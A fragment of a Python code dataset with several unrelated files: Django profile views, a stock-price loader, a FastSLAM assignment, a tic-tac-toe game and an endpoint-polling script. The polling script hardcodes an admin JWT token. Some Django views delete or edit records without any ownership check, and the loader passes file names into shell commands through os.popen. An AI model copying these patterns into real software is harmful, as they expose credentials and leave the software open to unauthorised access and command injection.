\"json_key\": self.credentials,\n            },\n        }\n        return 
result\n","sub_path":"conpype/resources/gcs.py","file_name":"gcs.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"97712428","text":"from django.shortcuts import render\nfrom django.views import View\nfrom .models import SocialProfile, EducationWithInfo, WorkExperience, LanguageWithLevel\nfrom django.shortcuts import get_object_or_404\nfrom .forms import RegistrationForm, ProfileImageForm, PersonalDataForm, EducationWithInfoForm, WorkExperienceForm, InterestForm, SkillForm, LanguageWithLevelForm\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.db import transaction\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n\nclass ProfileView(LoginRequiredMixin, View):\n def get(self, request, profile_id):\n profile_data = get_object_or_404(SocialProfile, pk=profile_id)\n return render(request, 'social_profile/profile.html', {\n 'profile': profile_data\n })\n\n def post(self, request, profile_id):\n pass\n\n\nclass ProfileImageUpdateView(LoginRequiredMixin, View):\n\n def post(self, request):\n obj = get_object_or_404(SocialProfile, pk=request.user.socialprofile.id)\n image = request.FILES['profile_image']\n obj.profile_img = image\n obj.save()\n return HttpResponseRedirect(reverse('profile:profile_update', args=(obj.id,)))\n\n\nclass ProfileUpdateView(LoginRequiredMixin, View):\n def get(self, request, profile_id):\n obj = get_object_or_404(SocialProfile, pk=profile_id)\n image_form = ProfileImageForm\n return render(request, 'social_profile/profile_update_form.html', {\n 'image_form': image_form,\n 'obj': obj,\n })\n\n def post(self, request, profile_id):\n pass\n\n\nclass RegistrationView(View):\n def get(self, request):\n form = RegistrationForm\n return render(request, 'registration/registration.html', {\n 'form': form\n })\n\n @transaction.atomic\n def post(self, request):\n form = RegistrationForm(request.POST)\n if form.is_valid():\n profile_user = User.objects.create_user(\n request.POST['username'],\n request.POST['email'],\n request.POST['password']\n )\n\n profile = SocialProfile(\n user=profile_user,\n last_name=request.POST['last_name'],\n first_name=request.POST['first_name'],\n email=request.POST['email']\n )\n\n profile.save()\n return HttpResponseRedirect(reverse('institution:search'))\n else:\n return render(request, 'registration/registration.html', {'form': form})\n\n\nclass EducationAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = EducationWithInfoForm\n return render(request, 'social_profile/update/education.html', {'form': form})\n\n def post(self, request):\n form = EducationWithInfoForm(request.POST)\n if form.is_valid():\n educ = form.save(commit=False)\n educ.profile = request.user.socialprofile\n educ.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\nclass WorkExperienceAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = WorkExperienceForm\n return render(request, 'social_profile/update/work_experience.html', {'form': form})\n\n def post(self, request):\n form = WorkExperienceForm(request.POST)\n if form.is_valid():\n w_e = form.save()\n w_e.socialprofile_set.add(request.user.socialprofile)\n w_e.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно 
форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\nclass InterestAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = InterestForm\n return render(request, 'social_profile/update/interest.html', {'form': form})\n\n def post(self, request):\n form = InterestForm(request.POST)\n if form.is_valid():\n interest = form.save()\n interest.socialprofile_set.add(request.user.socialprofile)\n interest.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\nclass SkillAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = SkillForm\n return render(request, 'social_profile/update/skill.html', {'form': form})\n\n def post(self, request):\n form = SkillForm(request.POST)\n if form.is_valid():\n skill = form.save()\n skill.socialprofile_set.add(request.user.socialprofile)\n skill.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\nclass LanguageAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = LanguageWithLevelForm\n return render(request, 'social_profile/update/language_with_level.html', {'form': form})\n\n def post(self, request):\n form = LanguageWithLevelForm(request.POST)\n if form.is_valid():\n lang = form.save(commit=False)\n lang.profile = request.user.socialprofile\n lang.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\ndef personal_data_update(request, profile_id):\n if request.method == 'POST':\n obj = get_object_or_404(SocialProfile, pk=profile_id)\n form = PersonalDataForm(request.POST, instance=obj)\n if form.is_valid():\n form.save()\n return JsonResponse({'last_name': request.POST['last_name'],\n 'first_name': request.POST['first_name'],\n 'email': request.POST['email'],\n 'contact_information_phone': request.POST['contact_information_phone'],\n 'contact_information_address': request.POST['contact_information_address'],\n 'date_of_birth': request.POST['date_of_birth'],\n 'patronymic': request.POST['patronymic'],\n 'about_myself': request.POST['about_myself'],\n }, safe=False)\n else:\n return JsonResponse({'': ''}, safe=False)\n else:\n obj = get_object_or_404(SocialProfile, pk=profile_id)\n personal_data_form = PersonalDataForm(instance=obj)\n return render(request, 'social_profile/update/personal_data.html', {\n 'form': personal_data_form,\n 'obj': obj\n })\n\n\ndef educationWithInfoDelete(request, education_id):\n if request.method == 'POST':\n ed_with_info = get_object_or_404(EducationWithInfo, pk=education_id)\n ed_with_info.delete()\n return JsonResponse({'': ''}, safe=False)\n else:\n pass\n\n\ndef languageWithLevelDelete(request, lang_id):\n if request.method == 'POST':\n lang = get_object_or_404(LanguageWithLevel, pk=lang_id)\n lang.delete()\n return JsonResponse({'': ''}, safe=False)\n else:\n pass\n\n\ndef workExperienceDelete(request, w_e_id):\n if request.method == 'POST':\n w_e = get_object_or_404(WorkExperience, pk=w_e_id)\n w_e.delete()\n return JsonResponse({'': ''}, safe=False)\n else:\n pass","sub_path":"social_profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"399863532","text":"#coding:utf8\nimport 
os\nimport numpy as np\nimport datetime\n\nfrom . import half\n\n##### meta_dir\nmeta_dir='meta'\n\nstock_ids=os.path.join(meta_dir,'stock_ids.txt') ## list of stock codes\nindex_ids=os.path.join(meta_dir,'index_ids.txt') ## list of index codes\nindustries=os.path.join(meta_dir,'industries.txt')\n\n#### root data directory\ndata_dir='data'\n\n# directory of daily history records\ndaily_dir=os.path.join(data_dir,'163_daily')\n\n\"\"\"output\"\"\"\n\noutput_dir='output'\n\n\n## functions\n\ndef symbol_to_filename(symbol):\n    # a quick shortcut for the daily data\n    if symbol[0]=='0' :\n        return os.path.join(daily_dir,symbol+'.sz')\n    else :\n        return os.path.join(daily_dir,symbol+'.ss')\n\n\ndef from_symbols_list_file(filename):\n    return [line.strip() for line in open(filename)]\n\ndef load_recent_dates(ndays=100,index='399001.sz'):\n    #index='000001.ss'\n    index300=os.path.join(daily_dir,index)\n    x=os.popen('head -n %d %s'%(ndays+1,index300)).read().splitlines()[1:]\n    x=[l.split(',') for l in x]\n    days=[l[0] for l in x]\n    return days\n\ndef get_symbol_list(bk='主板'):\n    # bk='主板' means 'main board'; the string value is kept as-is since callers pass it\n    li = open(stock_ids).read().splitlines()[1:]\n    if bk =='主板' :\n        return [x for x in li if x[:3]!='002']\n    return []\n    \n    #return [line.strip() for line in open(haitai.stock_ids)]\n\ndef load_industries():\n    d=dict()\n    for line in open(industries) :\n        line=line.strip()\n        s,_,others=line.partition(' ')\n        s+='.sz' if s[0]=='0' else '.ss'\n        others,_,ind=others.rpartition(' ')\n        others,_,big=others.rpartition(' ')\n        ind=big+'-'+ind\n        if ind not in d : d[ind]=[]\n        d[ind].append(s)\n    return d\n\ndef load_names():\n    d=dict()\n    for line in open(industries) :\n        line=line.strip()\n        s,_,others=line.partition(' ')\n        s+='.sz' if s[0]=='0' else '.ss'\n        others,_,ind=others.rpartition(' ')\n        others,_,big=others.rpartition(' ')\n        d[s]=(others)\n    return d\n\n\n\ndef gen_array(symbol,ndays=100):\n    filename=os.path.join(daily_dir,symbol)\n    x=os.popen('head -n %d %s'%(ndays+1,filename)).read().splitlines()[1:]\n    x=[l.split(',') for l in x]\n    name=x[0][2]\n    days=[[l[0],l[3],float(l[7])] for l in x]\n    \n    k=1\n    last=None\n    for i,day in enumerate(days) :\n        flag=False\n        if day[1]=='' or day[1]=='0.0': \n            flag=True\n            day[1]=day[2]\n        else : \n            day[1]=float(day[1])\n        if last==None :\n            last=day[2]\n        else :\n            if last!=day[1] :\n                k=k*day[1]/last\n            pass\n            last=day[2]\n        day[1]/=k\n        #if flag : return None,None,None\n    dates,prices,_=(zip(*days))\n    return name,dates,prices\n\nclass Symbol (object) :\n    def __init__(self, s):\n        if type(s) is Symbol :\n            self.market = s.market\n            self.number = s.number\n            return\n        if len(s) == 7 :\n            self.market = 'ss' if s[0] == '0' else 'sz'\n            self.number = s[1:]\n            return\n        if len(s) == 6 :\n            self.number = s\n            if s[0] in '6' :\n                self.market = 'ss'\n            else :\n                self.market = 'sz'\n            return\n        if len(s) == 9 :\n            self.number,_ , self.market = s.partition('.')\n            return\n\n    def to_ndm(self):\n        return \"%s.%s\"%(self.number, self.market)\n\n\ndef get_daily(symbol, ndays = 100):\n    sym = Symbol(symbol)\n    filename = os.path.join(daily_dir, sym.to_ndm())\n\n    x = os.popen(\n        'head -n %d %s'%(ndays + 1, filename)\n    ).read().splitlines()[1:]\n\n    x=[l.split(',') for l in x]\n    name=x[0][2]\n    days=[[l[0],l[3],float(l[7])] for l in x]\n    \n    k = 1 # price-adjustment factor\n    last = None\n    for i, day in enumerate(days):\n        if day[1]=='' or day[1]=='0.0': # when trading was suspended\n            day[1]=day[2]\n        else : \n            day[1]=float(day[1])\n\n        # compare against the recorded close day[1] (not the date day[0]),\n        # matching gen_array and daily above/below\n        if last is not None and last != day[1] :\n            k = k * day[1] / last\n\n        last = day[2]\n        day[1] /= k\n\n    dates,prices,_=(zip(*days))\n    prices=np.array(prices)\n    dates=[list(map(int,date.split('-')))for date in dates]\n    dates=[datetime.date(*date) for date in dates]\n    
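# Illustration of the adjustment loop above (hypothetical numbers, not\n    # from the data): if the close carried over from the previous row is\n    # 10.0 and this row records day[1] = 5.0 (say, after a 2-for-1 split),\n    # k is rescaled by 5.0 / 10.0 = 0.5, and dividing every later raw price\n    # by the running k splices the two price regimes into one continuous,\n    # comparable series.\n    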
return {'name':name,'date':dates,'price':prices,'symbol':symbol}\n\ndef daily(symbol,ndays=100):\n filename=os.path.join(daily_dir,symbol)\n x=os.popen('head -n %d %s'%(ndays+1,filename)).read().splitlines()[1:]\n x=[l.split(',') for l in x]\n name=x[0][2]\n days=[[l[0],l[3],float(l[7])] for l in x]\n \n k=1\n last=None\n for i,day in enumerate(days) :\n flag=False\n if day[1]=='' or day[1]=='0.0': \n flag=True\n day[1]=day[2]\n else : \n day[1]=float(day[1])\n if last==None :\n last=day[2]\n else :\n if last!=day[1] :\n k=k*day[1]/last\n pass\n last=day[2]\n day[1]/=k\n #if flag : return None,None,None\n dates,prices,_=(zip(*days))\n prices=np.array(prices)\n dates=[list(map(int,date.split('-')))for date in dates]\n dates=[datetime.date(*date) for date in dates]\n return {'name':name,'date':dates,'price':prices,'symbol':symbol}\n\n\ndef symbols(syms=set()):\n for line in open(stock_ids) :\n line=line.strip()\n","sub_path":"haitai/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"110487285","text":"#! /usr/bin/python\n\nfrom __future__ import division\nimport numpy as np\nfrom numpy import dot\nimport math\nimport argparse\nimport utilsObfuscated as utils\nimport visualizer\nimport random\nfrom time import sleep\nimport copy\n\nnp.set_printoptions(suppress=True)\ndebug = False\n\nclass Particle(object): \n \"\"\" container for particle information\n\n each particle holds its estimation of the robot's location\n as well as its estimate of each landmark's location\n\n attributes: \n robot_position: a tuple of the robot's position (x, y) and \n heading (phi)\n i.e., (x, y, phi)\n landmarks: a list of tuples of landmark locations described by \n mean (x, y) and a covariance matrix sigma\n i.e., [((x, y), sigma)]\n weight: the current weight for the particle; stored inside\n the particle for convenience. remember to reset after\n resampling\n\n \"\"\"\n\n def __str__(self): \n \"\"\" \n Return a string reprsenting each particle; good for debugging purposes. \n \"\"\"\n return \"\"\n\n def __init__(self, x, y, phi):\n super(Particle, self).__init__()\n self.robot_position = (x, y, phi)\n self.landmarks = []\n # log of the weight\n self.weight = 0.0; \n\n\n# ----- PARAMETERS ----- Feel free to experiment, but please use these values for your final handin\n# velocity noise\nsigma_v = 0.1\n# radial noise\nsigma_r = 0.01\n# added control noise; for update_robot sample\nsigma_control = np.array([[sigma_v**2, 0], [0, sigma_r**2]])\n\n# distance (range) noise \nsigma_d = 3\n# bearing noise\nsigma_p = .30\n# observation noise\nsigma_observation = np.array([[sigma_d**2, 0], [0, sigma_p**2]])\n\n# probability threshold (for update_map)\nprob_threshold = 0.005\n\ndef generate_initial_particles(lmap, num_states, init_state):\n \"\"\" generates the list of initial particles\n\n args: \n num_states: the number of particles to generate\n init_state: the position in which to generate the particles\n\n returns: \n the list of generated particles\n\n \"\"\"\n return [Particle(init_state[0], init_state[1], init_state[2]) for i in range(num_states)]\n\n\ndef update_robot(particle, control): \n \"\"\" updates the robot's position according to control\n\n the robot's new position is determined based on the control, with \n added noise to account for control error. 
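A minimal worked example (illustrative\n    numbers, not from the assignment): from pose (0, 0, 0), a sampled\n    (velocity, bearing) of (1.0, pi/2) gives new_theta = pi/2,\n    new_x = 0 + cos(pi/2) * 1.0 = 0.0 and new_y = 0 + sin(pi/2) * 1.0 = 1.0,\n    i.e. the robot turns first and then drives along its new heading.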
\n\n    args: \n        particle: the particle containing the robot position information\n        control: the control applied to the robot\n    \n    returns: \n        the updated particle \n    \"\"\"\n    curr_x, curr_y, curr_theta = particle.robot_position\n    control_theta, control_velocity = control\n    \n\n    #value of this noise is sampled from a multivariate gaussian with \n    #mean of the control's velocity and bearing\n    # covariance (represented as a 2x2 matrix) of the parameter sigma_control (the control noise)\n\n    mean = (control_velocity, control_theta)\n    noise_distance, noise_bearing = utils.gauss_sample(mean, sigma_control)\n    \n    #new absolute angle is current angle plus the bearing calculated\n    new_theta = curr_theta + noise_bearing\n    #use new angle to calculate new positions\n    new_x = curr_x + math.cos(new_theta)*noise_distance\n    new_y = curr_y + math.sin(new_theta)*noise_distance\n    #update the robot's position\n    particle.robot_position = (new_x, new_y, new_theta)\n\n    return particle\n\ndef add_landmark(particle, measurement): \n    \"\"\" adds newly observed landmark to particle\n\n    if a landmark has not been matched to an existing landmark, \n    add it to the particle's list with the appropriate \n    mean (x, y) and covariance (sigma)\n\n    args: \n        particle: the particle to add the new landmark to\n        measurement: the measurement to the new landmark (distance, bearing) to add to the particle\n\n    returns: \n        None\n    \"\"\"\n    robot_x, robot_y, robot_theta = particle.robot_position\n    distance, bearing = measurement\n\n\n    #use trig to find the landmark's position\n    landmark_x = distance*math.cos(bearing + robot_theta) + robot_x\n    landmark_y = distance*math.sin(bearing + robot_theta) + robot_y\n\n    jacobian = utils.calculate_jacobian((robot_x, robot_y), (landmark_x, landmark_y))\n    init_cov = utils.compute_initial_covariance(jacobian, sigma_observation)\n\n    #initialize particle.landmarks if necessary \n    #add the position and covariance\n    if len(particle.landmarks) == 0:\n        particle.landmarks = [((landmark_x, landmark_y), init_cov)]\n    else:\n        particle.landmarks.append(((landmark_x, landmark_y), init_cov))\n\n    return None\n\ndef update_landmark(particle, landmark, measurement):\n    \"\"\" update the mean and covariance of a landmark\n\n    uses the Extended Kalman Filter (EKF) to update the existing\n    landmark's mean (x, y) and covariance according to the new measurement\n\n    args: \n        particle: the particle to update\n        landmark: the old_landmark to update, ((x, y), covariance)\n        measurement: the new measurement to `landmark`, \n            in the form of (distance, bearing)\n    \n    returns: \n        None\n    \"\"\"\n    robot_x, robot_y, robot_theta = particle.robot_position\n    distance, bearing = measurement\n\n    landmark_pos = landmark[0]\n    oldCovariance = landmark[1]\n    landmark_x = landmark_pos[0]\n    landmark_y = landmark_pos[1]\n    x_dif = landmark_x-robot_x\n    y_dif = landmark_y-robot_y\n    #calculate the predicted measurement using landmark and robot positions;\n    #the predicted bearing is relative to the robot's heading, as in update_map\n    m_r = math.sqrt(x_dif*x_dif + y_dif*y_dif)\n    m_phi = math.atan2(y_dif, x_dif) - robot_theta\n    predicted_measurement = (m_r, m_phi)\n\n    jacobian = utils.calculate_jacobian((robot_x, robot_y), (landmark_x, landmark_y))\n    Q = utils.compute_measurement_covariance(jacobian, oldCovariance, sigma_observation)\n    K = utils.compute_kalman_gain(jacobian, oldCovariance, Q)\n\n    new_landmark = utils.compute_new_landmark(measurement, predicted_measurement, K, landmark_pos)\n\n    new_cov = utils.compute_new_covariance(K, jacobian, oldCovariance)\n\n    #remove the landmark from the particle's list of landmarks then change landmark 
and add it back\n particle.landmarks.remove(landmark)\n landmark = (new_landmark, new_cov)\n particle.landmarks.append(landmark)\n\ndef update_map(particle, measurements): \n\n \"\"\" associates new measurements with old landmarks\n\n given a list of measurements to landmarks, determine whether a \n landmark is a new landmark or a re-observed landmark. If it is\n a new one, call add_landmark(). If it is an existing landmark, \n call update_landmark(), and update the weight. \n \n \n traditionally done maximizing the likelihood of observation at\n that particular correspondance\n\n args: \n particle: the particle to perform the data association on\n measurements: a list of (distance, bearing) where a landmark was observed\n\n returns: \n index pairs? none if not matched\n\n \"\"\"\n # retrieve the newly sampled robot pos\n robot_x,robot_y,robot_theta = particle.robot_position\n\n \n #some measurements were [] so need to loop through and only work with the valid ones\n valid_measurements = []\n for m in measurements:\n if len(m)>0:\n valid_measurements.append(m)\n\n weight_as_log_sum = 0\n #loop through non-empty measurements to find the best landmark and best probability\n for measurement in valid_measurements:\n best_landmark = None\n best_prob = 0\n for landmark in particle.landmarks:\n landmark_pos = landmark[0]\n oldCovariance = landmark[1]\n landmark_x, landmark_y = landmark_pos\n x_dif = landmark_x-robot_x\n y_dif = landmark_y-robot_y\n m_r = math.sqrt(x_dif*x_dif + y_dif*y_dif)\n m_phi = math.atan2(y_dif,x_dif)-robot_theta\n #calculate where the landmark should be \n predicted_measurement = (m_r, m_phi)\n\n jacobian = utils.calculate_jacobian((robot_x, robot_y), (landmark_x, landmark_y))\n Q = utils.compute_measurement_covariance(jacobian, oldCovariance, sigma_observation)\n likelihood = utils.calculate_likelihood_probability(measurement, predicted_measurement, Q)\n if likelihood > best_prob:\n best_prob = likelihood\n best_landmark = landmark\n #if the landmark is likely to be a new landmark then add it \n if best_prob < prob_threshold:\n add_landmark(particle, measurement)\n weight_as_log_sum += np.log(prob_threshold)\n #otherwise if it is likely the same as an observed landmark, update it\n else: \n update_landmark(particle, best_landmark, measurement)\n weight_as_log_sum += np.log(best_prob)\n\n #update the particles weight, will take e^weight later\n particle.weight = weight_as_log_sum \n\n\n\n\ndef resample_particles(particles): \n \"\"\" resample particles according to weight\n\n Sample (with replacement) from the list of particles \n according to their weight, which was assigned in the \n update_map() section. 
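In sketch form (describing the body\n    below): w_i = exp(weight_i) / sum_j exp(weight_j), and a single\n    numpy.random.multinomial(num_particles, w) draw decides how many copies\n    of each particle survive into the next generation. 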
Be sure to copy each particle\n\n    args: \n        particles: a list of particles to sample from\n\n    returns: \n        a list of particles of the same length as the \n        input, sampled according to the particle's weight\n    \"\"\"\n\n    num_particles = len(particles)\n    \n    #find the sum of the particle weights to normalize vector\n    particle_weight_sum = 0\n    for particle in particles:\n        particle_weight_sum += np.exp(particle.weight)\n\n\n    #normalize particle_weights\n    norm_particle_weights = []\n    for i in range (0, num_particles):\n        norm_particle_weights.append(np.exp(particles[i].weight)/particle_weight_sum)\n    \n    #sample_results will be a list where the ith element represents how many times the ith particle\n    #was chosen to be in the new sample\n    sample_results = list(np.random.multinomial(num_particles, norm_particle_weights))\n\n    new_particles = []\n    #loop through all the particles, adding each to new_particles the number of times specified by sample_results\n    for k in range(0,num_particles):\n        for i in range (0, sample_results[k]):\n            to_add = copy.deepcopy(particles[k])\n            to_add.weight = 0\n            new_particles.append(to_add)\n\n    return new_particles\n\n\ndef SLAM(init_particles, controls, measurements, true_position, true_landmarks, lidar_map, vis=1): \n    \"\"\" Runs the fastSLAM algorithm on the given inputs\n\n    Args: \n        init_particles: an Nx3 array of (x-coordinate, y-coordinate, phi), the initial candidate points.\n        controls: a Tx2 array of (degree change, velocity), the movement at each time step.\n        measurements: a TxMx2 array of (distance, angle), the measured distance to a landmark in that direction at that timestep.\n        true_position - a (T+1)x3 array representing the true position of the robot from start to end\n        true_landmarks - a TxK array of landmarks representing the true locations of the landmarks\n        lidar_map: an XxY array representing a discretized map. Each position in the array represents whether a space is empty, represented by a 0, or filled (an obstacle) represented by a 1. Generated by calling utils.load_map on the appropriate .pgm file.\n\tvis: a flag dictating whether to run the visualizer or not. 
You should NOT make any changes that result\tin the visualizer being called when vis=False\n \n Returns: \n None\n \"\"\"\n\n if vis > 0:\n visualizer.init_vis(lidar_map, true_landmarks, init_particles, true_position[0,:], vis)\n particles = init_particles\n\n #for a timestep t\n for t in range(len(measurements)): \n \n #update the particles by calling update_robot to get the new particle for every particle\n #then for every particle call update map with the measurement at time t\n new_particles = []\n for particle in particles:\n new_particle = update_robot(particle, controls[t])\n new_particles.append(new_particle)\n update_map(new_particle, measurements[t])\n \n \n if vis > 0:\n visualizer.update_vis(lidar_map, true_landmarks, new_particles, true_position[t+1,:], vis)\n\n #resample the particles\n particles = resample_particles(new_particles)\n \n\ndef main(): \n \n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--test', help=\"A test directory containing map.pgm, measure.csv, control.csv, and ground.csv files\", required=True)\n parser.add_argument('-v', '--visualizer', type=int, default=0, help='0 : off, 1 : default visualizer, 2 : particle visualizer')\n parser.add_argument('-n', '--numstart', type=int, default=50)\n parser.add_argument('-e', '--error', type=float, default=0.0)\n\n args = parser.parse_args()\n lmap = utils.load_map('tests/' + args.test + '/map.pgm')\n landmarks = utils.load_csv('tests/' + args.test + '/landmarks.csv')\n controls = utils.load_csv('tests/' + args.test + '/control.csv') #a Tx2 array of T (delta phi, velocity)'s\n measurements = [[np.random.multivariate_normal((distance, bearing), args.error*sigma_observation) for distance, bearing in measurement] for measurement in utils.load_measurements('tests/' + args.test + '/measure.csv')]\n true_start = utils.load_csv('tests/' + args.test + '/ground.csv')\n start_posns = generate_initial_particles(lmap, args.numstart, true_start[0])\n if debug:\n print(\"Running SLAM...\")\n SLAM(start_posns, controls, measurements, true_start, landmarks, lmap, args.visualizer)\n\nif __name__ == \"__main__\": \n main()\n","sub_path":"fastSLAM.py","file_name":"fastSLAM.py","file_ext":"py","file_size_in_byte":13773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"173251355","text":"# 실험 번호, 실험 환경 번호, 사용자 고유 이름(room number), \\\n# 시작 장치 번호, 시작 장치 서버 도달 시간, 시작 직선 정보(x, y, timestamp(delta)) 10개, \\\n# 끝 장치 번호, 끝 장치 서버 도달 시간, 끝 직선 정보(x, y, timestamp(delta))\n\n\n#{'1': [[[0, 0], [1120.0, 0.0], [1120.0, 788.0386983289358], [0.0, 788.0386983289358]], 1, 0], '2': [[[1618.5888428851285, -191.02877813636232], [2540.7599485821715, -68.71102380729093], [2454.696445096457, 580.1340813445421], [1532.5253393994144, 457.81632701547073]], 0.8305784945014116, 0.13187129094494932]}\n\n# 장치-직선정보:\n## 1. 장치 번호\n## 1.5 직선 번호\n## 2. 직선 정보 서버 도달 시간\n## 3. 
직선 정보(x, y, timestamp(delta)) 10개\nimport os\nimport json\nimport errno  # createFolder below references errno.EEXIST\n\ndef createFolder(dir):\n    try:\n        if not(os.path.isdir(dir)):\n            os.makedirs(os.path.join(dir))\n    except OSError as e:\n        if e.errno != errno.EEXIST:\n            raise\n\nexp_seq = 0\nexp_path = \"./exp/\"\ncreateFolder(exp_path)\nif not os.path.isfile(exp_path + \"meta.txt\"):\n    tmp = open(exp_path + \"meta.txt\", \"w\")\n    tmp.write(str(exp_seq))\n    tmp.close()\n\ntmp = open(exp_path + \"meta.txt\", \"r\")\nexp_seq = int(tmp.read())\nprint(\"the present exp_seq: \" + str(exp_seq))\ntmp.close()\nsave_path = exp_path + \"data/\"\n# save new device-line data\ndef saveLine(data):\n    global exp_seq\n    for i, d in enumerate(data):\n        fn = str(exp_seq) + \"-\" + str(d['env']) + \"-\" + str(int(d['line_num'])) + \"-\" + str(d['subject']) + \".json\"\n        ret = open(save_path + fn, \"w\")\n        ret.write(json.dumps(d, ensure_ascii=False, indent=\"\\t\"))\n        ret.close()\n    exp_seq += 1\n    tmp = open(exp_path + \"meta.txt\", \"w+\")\n    tmp.write(str(exp_seq))\n    tmp.close()\n\ndef storePattern(data, expNum):\n    global exp_seq\n    fn = str(exp_seq) + \"-\" + str(expNum) + \".json\"\n    ret = open(exp_path + \"dataPattern/\" + fn, \"w\")\n    ret.write(json.dumps(data, ensure_ascii=False, indent=\"\\t\"))\n    ret.close()\n    exp_seq += 1\n    tmp = open(exp_path + \"meta.txt\", \"w+\")\n    tmp.write(str(exp_seq))\n    tmp.close()","sub_path":"pythons/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"195928038","text":"# simulate tic tac toe game play\n\n\n# draw game board\ndef draw_game_board(board_values):\n    horizontal = \" --- \" * 3\n    for i in range(3):\n        print(horizontal)\n        print((\"| %s \" % board_values[i][0]) + (\"| %s \" % board_values[i][1]) + (\"| %s \" % board_values[i][2]) + '|')\n    print(horizontal)\n\n\n# player game play\ndef player_move(player_param):\n    if player_param == 1:\n        player_one_coord = str(input('Player one move: ')).strip().split(',')\n        return ['X', player_one_coord]\n    elif player_param == 2:\n        player_two_coord = str(input('Player two move: ')).strip().split(',')\n        return ['O', player_two_coord]\n\n\n# validate user input\ndef validate_player_input(list_param):\n    if len(list_param[1]) != 2:\n        print('Invalid input, Please play again')\n        return False\n\n    # the original chained comparison \"1 < x > 3\" can never be true;\n    # reject any coordinate outside the 1..3 range instead\n    if not (1 <= int(list_param[1][0]) <= 3) or not (1 <= int(list_param[1][1]) <= 3):\n        print('Please enter correct co-ordinates')\n        return False\n\n    return True\n\n\n# populate the board\ndef board_play(player_values_list, board_param):\n    player_value = player_values_list[0]\n    row_value = int(player_values_list[1][0]) - 1\n    column_value = int(player_values_list[1][1]) - 1\n\n    if board_param[row_value][column_value] != 0:\n        print('The board is already played, Please play again')\n        return False\n    else:\n        board_param[row_value][column_value] = player_value\n        return True\n\n\n# game play\ndef game_play(player_param, board_param):\n    while True:\n        p_play = player_move(player_param)\n        if validate_player_input(p_play):\n            if board_play(p_play, board_param):\n                # redraw the board\n                draw_game_board(board_param)\n                break\n\n\n# check if board is full\ndef plays(plays_numbers):\n    if plays_numbers == 0:\n        print('All moves have been played. 
There is no winner')\n return True\n\n\n# check winner from board\ndef check_winner(board_param):\n # check row\n for x in range(3):\n if board_param[x][0] != 0:\n if board_param[x][0] == board_param[x][1] == board_param[x][2]:\n return board_param[x][0]\n\n # check columns\n for y in range(3):\n if board_param[0][y] != 0:\n if board_param[0][y] == board_param[1][y] == board_param[2][y]:\n return board[0][y]\n\n # check diagonals\n if board[1][1] != 0:\n if board[0][0] == board[1][1] == board[2][2]:\n return board[1][1]\n\n if board[1][1] != 0:\n if board[0][2] == board[1][1] == board[2][0]:\n return board[1][1]\n\n return False\n\n\n# print game winner\ndef print_winner(win_value):\n if win_value == 'X':\n print('\\nplayer one won')\n elif win_value == 'O':\n print('\\nPlayer two won')\n\n\n# switch player\ndef switch_player(player_param):\n if player_param == 1:\n return 2\n else:\n return 1\n\n\nif __name__ == '__main__':\n\n print('\\nWelcome to tic tac toe game')\n print('Player one is X and player two is 0')\n print('Make a move by typing the co-ordinates of where you want to play')\n print('use this format 1,2 where 1 is row and 2 is column\\n')\n print('Please use numbers 1,2,3\\n')\n\n board, playing, plays_number, player = [[0, 0, 0], [0, 0, 0], [0, 0, 0]], True, 9, 1\n\n # draw initial empty board\n draw_game_board(board)\n\n while playing:\n\n # player Game Play\n game_play(player, board)\n\n # check winner and print or continue\n grid_check = check_winner(board)\n if grid_check:\n print_winner(grid_check)\n break\n\n # update the number of plays left\n plays_number -= 1\n if plays(plays_number):\n break\n else:\n # switch player\n player = switch_player(player)\n","sub_path":"029_tic_tac_toe_full.py","file_name":"029_tic_tac_toe_full.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"440397894","text":"import slowclap as sc\nimport requests\n\ndef getActivated(headers):\n\tresp = requests.get(\"http://projects.danjscott.co.uk/intheroom/isActivated\", headers=headers)\n\tif resp.status_code == 200:\n\t\treturn True;\n\telse:\n\t\treturn False;\n\n\ndeactivateUrl = \"http://projects.danjscott.co.uk/intheroom/Deactivate\"\n\nactivateUrl = \"http://projects.danjscott.co.uk/intheroom/Activate\"\n\ntoken = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJwYXNzIjoiYWRtaW4iLCJpYXQiOjE1NTQzMzE3NDYsImV4cCI6MS4wMDAwMDAwMDAwMDE1NTQ1ZSsyMX0.qzxBdYfCGxcvQkhaCBsKiC7DVVG0wOZMe68axjw0x5M\"\nheaders = {'x-access-token': token}\n\nactivated = getActivated(headers)\n\n\n\n\nif __name__ == '__main__':\n\tif (activated):\n\t\tprint(\"Started - Currently 